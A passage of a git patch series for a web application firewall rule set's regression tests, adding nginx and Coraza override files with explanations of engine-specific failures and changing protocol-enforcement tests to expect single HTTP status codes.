From 47a97c18cebb2e0a1fe741041d54d3744e533ee2 Mon Sep 17 00:00:00 2001 From: Max Leske Date: Thu, 9 Nov 2023 10:00:35 +0100 Subject: [PATCH 01/18] feat: add test overrides for nginx --- tests/regression/nginx-overrides.yaml | 205 ++++++++++++++++++++++++++ 1 file changed, 205 insertions(+) create mode 100644 tests/regression/nginx-overrides.yaml diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml new file mode 100644 index 000000000..13d0349c2 --- /dev/null +++ b/tests/regression/nginx-overrides.yaml @@ -0,0 +1,205 @@ +version: "v0.0.0" +meta: + engine: "libmodsecurity3" + platform: "nginx" + annotations: + - os: "Debian Bullseye" + - purpose: "CRS test suite" +test_overrides: + - name: "920100-4" + reason: "Nginx returns a 400 bad request" + status: 400 + expect_failure: false + - name: "920100-8" + reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" + status: 404 + expect_failure: false + - name: "920100-14" + reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." + expect_failure: true + - name: "920100-16" + reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default" + expect_failure: true + - name: "920181-1" + reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" + status: 400 + - name: "920260-3" + reason: "IIS related vulnerability (2007)" + expect_failure: true + - name: "920270-4" + reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" + expect_failure: false + status: 200 + log_contains: "id \"920270\"" + - name: "920290-4" + reason: "Nginx returns 400 if Host header is missing" + log_contains: "" + status: 400 + - name: "920430-8" + reason: + expect_failure: true + - name: "932200-13" + reason: + expect_failure: true + - name: "933110-3" + reason: + expect_failure: true + - name: "933110-13" + reason: + expect_failure: true + - name: "933110-14" + reason: + expect_failure: true + - name: "933110-20" + reason: + expect_failure: true + - name: "933110-21" + reason: + expect_failure: true + - name: "933110-22" + reason: + expect_failure: true + - name: "933110-24" + reason: + expect_failure: true + - name: "933110-25" + reason: + expect_failure: true + - name: "933110-26" + reason: + expect_failure: true + - name: "933110-27" + reason: + expect_failure: true + - name: "934131-5" + reason: + expect_failure: true + - name: "934131-7" + reason: + expect_failure: true + - name: "941180-7" + reason: + expect_failure: true + - name: "942131-3" + reason: + expect_failure: true + - name: "942131-5" + reason: + expect_failure: true + - name: "942131-7" + reason: + expect_failure: true + - name: "942550-26" + reason: + expect_failure: true + - name: "942550-28" + reason: + expect_failure: true + - name: "942550-30" + reason: + expect_failure: true + - name: "942550-32" + reason: + expect_failure: true + - name: "944100-11" + reason: + expect_failure: true + - name: "944100-12" + reason: + expect_failure: true + - name: "944100-15" + reason: + expect_failure: true + - name: "944100-16" + reason: + expect_failure: true + - name: "944110-11" + reason: + expect_failure: true + - name: "944110-12" + reason: + expect_failure: true + - name: "944110-15" + reason: + expect_failure: true + - name: "944110-16" + reason: + expect_failure: true + - name: "944120-6" + reason: + expect_failure: true + - name: "944120-7" + reason: + expect_failure: true + - name: "944120-23" + reason: + expect_failure: true + - name: "944120-24" + reason: + expect_failure: true + - name: "944120-40" + reason: + expect_failure: true + - name: "944120-41" + reason: + expect_failure: true + - name: "944120-57" + reason: + expect_failure: true + - name: "944120-58" + reason: + expect_failure: true + - name: "944120-74" + reason: + expect_failure: true + - name: "944120-75" + reason: + expect_failure: true + - name: "944120-91" + reason: + expect_failure: true + - name: "944120-92" + reason: + expect_failure: true + - name: "944120-108" + reason: + expect_failure: true + - name: "944120-109" + reason: + expect_failure: true + - name: "944120-125" + reason: + expect_failure: true + - name: "944120-126" + reason: + expect_failure: true + - name: "944140-3" + reason: + expect_failure: true + - name: "944140-8" + reason: + expect_failure: true + - name: "944210-6" + reason: + expect_failure: true + - name: "944210-7" + reason: + expect_failure: true + - name: "944210-23" + reason: + expect_failure: true + - name: "944210-24" + reason: + expect_failure: true + - name: "944210-40" + reason: + expect_failure: true + - name: "944210-41" + reason: + expect_failure: true + - name: "980170-1" + reason: + expect_failure: true + - name: "980170-2" + reason: + expect_failure: true From 991d3aa3c6761fa6fe483cbb803048515905c4b3 Mon Sep 17 00:00:00 2001 From: Max Leske Date: Thu, 9 Nov 2023 16:34:55 +0100 Subject: [PATCH 02/18] feat: update schema --- tests/regression/nginx-overrides.yaml | 211 +++++++++++++++++--------- 1 file changed, 140 insertions(+), 71 deletions(-) diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 13d0349c2..2af721efa 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -6,200 +6,269 @@ meta: - os: "Debian Bullseye" - purpose: "CRS test suite" test_overrides: - - name: "920100-4" + - rule_id: 920100 + test_id: 4 reason: "Nginx returns a 400 bad request" - status: 400 + output: + status: 400 expect_failure: false - - name: "920100-8" + - rule_id: 920100 + test_id: 8 reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" - status: 404 + output: + status: 404 expect_failure: false - - name: "920100-14" + - rule_id: 920100 + test_id: 14 reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." expect_failure: true - - name: "920100-16" + - rule_id: 920100 + test_id: 16 reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default" expect_failure: true - - name: "920181-1" + - rule_id: 920181 + test_id: 1 reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" - status: 400 - - name: "920260-3" + output: + status: 400 + - rule_id: 920260 + test_id: 3 reason: "IIS related vulnerability (2007)" expect_failure: true - - name: "920270-4" + - rule_id: 920270 + test_id: 4 reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" expect_failure: false - status: 200 - log_contains: "id \"920270\"" - - name: "920290-4" + output: + status: 200 + log_contains: "id \"920270\"" + - rule_id: 920290 + test_id: 4 reason: "Nginx returns 400 if Host header is missing" - log_contains: "" - status: 400 - - name: "920430-8" + output: + log_contains: "" + status: 400 + - rule_id: 920430 + test_id: 8 reason: expect_failure: true - - name: "932200-13" + - rule_id: 932200 + test_id: 13 reason: expect_failure: true - - name: "933110-3" + - rule_id: 933110 + test_id: 3 reason: expect_failure: true - - name: "933110-13" + - rule_id: 933110 + test_id: 13 reason: expect_failure: true - - name: "933110-14" + - rule_id: 933110 + test_id: 14 reason: expect_failure: true - - name: "933110-20" + - rule_id: 933110 + test_id: 20 reason: expect_failure: true - - name: "933110-21" + - rule_id: 933110 + test_id: 21 reason: expect_failure: true - - name: "933110-22" + - rule_id: 933110 + test_id: 22 reason: expect_failure: true - - name: "933110-24" + - rule_id: 933110 + test_id: 24 reason: expect_failure: true - - name: "933110-25" + - rule_id: 933110 + test_id: 25 reason: expect_failure: true - - name: "933110-26" + - rule_id: 933110 + test_id: 26 reason: expect_failure: true - - name: "933110-27" + - rule_id: 933110 + test_id: 27 reason: expect_failure: true - - name: "934131-5" + - rule_id: 934131 + test_id: 5 reason: expect_failure: true - - name: "934131-7" + - rule_id: 934131 + test_id: 7 reason: expect_failure: true - - name: "941180-7" + - rule_id: 941180 + test_id: 7 reason: expect_failure: true - - name: "942131-3" + - rule_id: 942131 + test_id: 3 reason: expect_failure: true - - name: "942131-5" + - rule_id: 942131 + test_id: 5 reason: expect_failure: true - - name: "942131-7" + - rule_id: 942131 + test_id: 7 reason: expect_failure: true - - name: "942550-26" + - rule_id: 942550 + test_id: 26 reason: expect_failure: true - - name: "942550-28" + - rule_id: 942550 + test_id: 28 reason: expect_failure: true - - name: "942550-30" + - rule_id: 942550 + test_id: 30 reason: expect_failure: true - - name: "942550-32" + - rule_id: 942550 + test_id: 32 reason: expect_failure: true - - name: "944100-11" + - rule_id: 944100 + test_id: 11 reason: expect_failure: true - - name: "944100-12" + - rule_id: 944100 + test_id: 12 reason: expect_failure: true - - name: "944100-15" + - rule_id: 944100 + test_id: 15 reason: expect_failure: true - - name: "944100-16" + - rule_id: 944100 + test_id: 16 reason: expect_failure: true - - name: "944110-11" + - rule_id: 944110 + test_id: 11 reason: expect_failure: true - - name: "944110-12" + - rule_id: 944110 + test_id: 12 reason: expect_failure: true - - name: "944110-15" + - rule_id: 944110 + test_id: 15 reason: expect_failure: true - - name: "944110-16" + - rule_id: 944110 + test_id: 16 reason: expect_failure: true - - name: "944120-6" + - rule_id: 944120 + test_id: 6 reason: expect_failure: true - - name: "944120-7" + - rule_id: 944120 + test_id: 7 reason: expect_failure: true - - name: "944120-23" + - rule_id: 944120 + test_id: 23 reason: expect_failure: true - - name: "944120-24" + - rule_id: 944120 + test_id: 24 reason: expect_failure: true - - name: "944120-40" + - rule_id: 944120 + test_id: 40 reason: expect_failure: true - - name: "944120-41" + - rule_id: 944120 + test_id: 41 reason: expect_failure: true - - name: "944120-57" + - rule_id: 944120 + test_id: 57 reason: expect_failure: true - - name: "944120-58" + - rule_id: 944120 + test_id: 58 reason: expect_failure: true - - name: "944120-74" + - rule_id: 944120 + test_id: 74 reason: expect_failure: true - - name: "944120-75" + - rule_id: 944120 + test_id: 75 reason: expect_failure: true - - name: "944120-91" + - rule_id: 944120 + test_id: 91 reason: expect_failure: true - - name: "944120-92" + - rule_id: 944120 + test_id: 92 reason: expect_failure: true - - name: "944120-108" + - rule_id: 944120 + test_id: 108 reason: expect_failure: true - - name: "944120-109" + - rule_id: 944120 + test_id: 109 reason: expect_failure: true - - name: "944120-125" + - rule_id: 944120 + test_id: 125 reason: expect_failure: true - - name: "944120-126" + - rule_id: 944120 + test_id: 126 reason: expect_failure: true - - name: "944140-3" + - rule_id: 944140 + test_id: 3 reason: expect_failure: true - - name: "944140-8" + - rule_id: 944140 + test_id: 8 reason: expect_failure: true - - name: "944210-6" + - rule_id: 944210 + test_id: 6 reason: expect_failure: true - - name: "944210-7" + - rule_id: 944210 + test_id: 7 reason: expect_failure: true - - name: "944210-23" + - rule_id: 944210 + test_id: 23 reason: expect_failure: true - - name: "944210-24" + - rule_id: 944210 + test_id: 24 reason: expect_failure: true - - name: "944210-40" + - rule_id: 944210 + test_id: 40 reason: expect_failure: true - - name: "944210-41" + - rule_id: 944210 + test_id: 41 reason: expect_failure: true - - name: "980170-1" + - rule_id: 980170 + test_id: 1 reason: expect_failure: true - - name: "980170-2" + - rule_id: 980170 + test_id: 2 reason: expect_failure: true From dfad9a19a6d6f6b2daed88fc5541897e62722f48 Mon Sep 17 00:00:00 2001 From: Max Leske Date: Sat, 11 Nov 2023 10:53:42 +0100 Subject: [PATCH 03/18] feat: add test overrides for Coraza --- tests/regression/coraza-overrides.yaml | 54 ++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 tests/regression/coraza-overrides.yaml diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml new file mode 100644 index 000000000..f4312c010 --- /dev/null +++ b/tests/regression/coraza-overrides.yaml @@ -0,0 +1,54 @@ +version: "v0.0.0" +meta: + engine: "coraza" + platform: "go" + annotations: + - purpose: "CRS test suite" +test_overrides: + - rule_id: 920100 + test_id: 4 + reason: 'Invalid uri, Coraza not reached - 404 page not found' + output: + status: 404 + - rule_id: 920100 + test_id: 5 + reason: 'Invalid uri, Coraza not reached - 404 page not found' + output: + status: 404 + - rule_id: 920100 + test_id: 8 + reason: 'Go/http allows a colon in the path. Test expects status 400 or 403 (Apache behaviour)' + output: + status: 200 + log_contains: "id:\"920100\"" + - rule_id: 920270 + test_id: 4 + reason: 'Rule works, log contains 920270. Test expects status 400 (Apache behaviour)' + output: + status: 200 + - rule_id: 920272 + test_id: 5 + reason: 'Rule works, log contains 920272. Test expects status 400 (Apache behaviour)' + output: + status: 200 + - rule_id: 920290 + test_id: 1 + reason: 'Rule works, log contains 920290. Test expects status 400 (Apache behaviour)' + output: + status: 200 + - rule_id: 920430 + test_id: 8 + reason: 'Go/http does not allow HTTP/3.0 - 505 HTTP Version Not Supported' + output: + status: 505 + log_contains: "" + no_log_contains: "id:\"920430\"" + - rule_id: 932200 + test_id: 13 + reason: 'wip' + - rule_id: 934131 + test_id: 5 + reason: 'TODO: check why we are failing to deobfuscate these payloads' + - rule_id: 934131 + test_id: 7 + reason: 'TODO: check why we are failing to deobfuscate these payloads' From 54e7d0702bf447f36e87e7709e30493adf99765e Mon Sep 17 00:00:00 2001 From: theMiddle Date: Thu, 9 Nov 2023 17:29:34 +0100 Subject: [PATCH 04/18] Update nginx-overrides.yaml --- tests/regression/nginx-overrides.yaml | 161 ++++++++++++++------------ 1 file changed, 90 insertions(+), 71 deletions(-) diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 2af721efa..5e8f1e723 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -31,10 +31,6 @@ test_overrides: reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" output: status: 400 - - rule_id: 920260 - test_id: 3 - reason: "IIS related vulnerability (2007)" - expect_failure: true - rule_id: 920270 test_id: 4 reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" @@ -50,225 +46,248 @@ test_overrides: status: 400 - rule_id: 920430 test_id: 8 - reason: - expect_failure: true + reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." + output: + log_contains: "" + status: 505 + expect_failure: false - rule_id: 932200 test_id: 13 - reason: + reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" expect_failure: true - rule_id: 933110 test_id: 3 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 13 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 14 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 20 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 21 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 22 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 24 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 25 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 26 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 27 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 934131 test_id: 5 - reason: + reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" expect_failure: true - rule_id: 934131 test_id: 7 - reason: + reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" expect_failure: true - rule_id: 941180 test_id: 7 - reason: + reason: "Rule remove by range doesn't work on v3 if used via ctl. https://github.com/coreruleset/coreruleset/pull/3302" expect_failure: true - rule_id: 942131 test_id: 3 - reason: + reason: "v3 log bug, the first part of the chain always produces a log" expect_failure: true - rule_id: 942131 test_id: 5 - reason: + reason: "v3 log bug, the first part of the chain always produces a log" expect_failure: true - rule_id: 942131 test_id: 7 - reason: + reason: "v3 log bug, the first part of the chain always produces a log" expect_failure: true - rule_id: 942550 test_id: 26 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 942550 test_id: 28 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 942550 test_id: 30 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 942550 test_id: 32 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 944100 test_id: 11 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944100 test_id: 12 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944100 test_id: 15 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944100 test_id: 16 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 11 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 12 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 15 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 16 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 6 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 7 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 23 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 24 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 40 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 41 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 57 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 58 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 74 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 75 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 91 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 92 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 108 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 109 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 125 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 126 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944140 test_id: 3 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944140 test_id: 8 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 6 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 7 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 23 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 24 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 40 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 41 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 980170 test_id: 1 - reason: + reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" expect_failure: true - rule_id: 980170 test_id: 2 - reason: + reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" expect_failure: true From bfc94aa24483ab042cf6d6205085b957ddebf87b Mon Sep 17 00:00:00 2001 From: Max Leske Date: Sat, 27 Apr 2024 14:43:19 +0200 Subject: [PATCH 05/18] chore: update tests to use single status code only --- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml | 16 ++++++++-------- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml | 10 +++++----- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml | 2 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml | 2 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml | 2 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml | 2 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml | 2 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml | 2 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml | 10 +++++----- 9 files changed, 24 insertions(+), 24 deletions(-) diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 6f26735a0..88109fb8d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -38,7 +38,7 @@ tests: uri: "/get" version: "HTTP/1.1" output: - status: [400] + status: 400 - test_title: 920100-3 desc: Perfectly valid OPTIONS request stages: @@ -70,7 +70,7 @@ tests: uri: "1.2.3.4:80" version: "HTTP/1.1" output: - status: [200] + status: 200 no_log_contains: "id \"920100\"" - test_title: 920100-5 desc: invalid Connect request, domains require ports @@ -87,7 +87,7 @@ tests: uri: "www.coreruleset.org" version: "HTTP/1.1" output: - status: [400] + status: 400 - test_title: 920100-6 desc: This is an acceptable CONNECT request for SSL tunneling stages: @@ -137,7 +137,7 @@ tests: uri: "/get/index.html:80?I=Like&Apples=Today#tag" version: "HTTP/1.1" output: - status: [400, 403] + status: 400 - test_title: 920100-9 desc: Normal Options request with path stages: @@ -187,7 +187,7 @@ tests: uri: "\\" version: "HTTP/1.1" output: - status: [403, 400] + status: 400 - test_title: 920100-12 desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions stages: @@ -205,7 +205,7 @@ tests: uri: "/get" version: HTTP/1.1 output: - status: [400] + status: 400 - test_title: 920100-13 desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions stages: @@ -223,7 +223,7 @@ tests: uri: \index.html version: HTTP\1.0 output: - status: [403, 400] + status: 400 - test_title: 920100-14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions stages: @@ -257,7 +257,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - status: [403, 400] + status: 400 - test_title: 920100-16 desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path" stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 4678ce4f9..980d2e7fd 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml @@ -21,7 +21,7 @@ tests: uri: "/" version: "HTTP/1.1" output: - status: [400] + status: 400 - # Non digit content-length with content-type test_title: 920160-2 stages: @@ -39,7 +39,7 @@ tests: uri: "/" version: "HTTP/1.1" output: - status: [400] + status: 400 - # Mixed digit and non digit content length test_title: 920160-3 stages: @@ -57,7 +57,7 @@ tests: uri: "/" version: "HTTP/1.1" output: - status: [400] + status: 400 - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post # Apache auto corrects for this error now so the log should not contain anything test_title: 920160-4 @@ -81,7 +81,7 @@ tests: version: HTTP/1.0 data: abc output: - status: [200] + status: 200 no_log_contains: id "920160" - test_title: 920160-5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions @@ -104,5 +104,5 @@ tests: version: HTTP/1.0 data: abc output: - status: [200, 403, 400] + status: 400 # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index 8dd729b78..af57064f1 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -24,5 +24,5 @@ tests: stop_magic: true output: # Apache unsets the Content-Length header if Transfer-Encoding is found! - status: [200] + status: 200 no_log_contains: id "920181" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index 5df5cf568..a71ca8d3c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -62,7 +62,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - status: [403, 400] + status: 400 # log_contains: "id \"920270\"" - test_title: 920270-5 stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index 899899fee..f4bfeb790 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml @@ -74,5 +74,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - status: [200] + status: 200 log_contains: "id \"920272\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index 25fbc7ccc..89b7980f7 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml @@ -22,7 +22,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - status: [200, 403, 400] + status: 200 # log_contains: "id \"920274\"" - test_title: 920274-2 stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml index fded38aaf..50b6baef6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml @@ -47,4 +47,4 @@ tests: uri: "/" output: # Technically valid but Apache doesn't allow 0.9 anymore - status: [400, 426, 505] + status: 400 diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 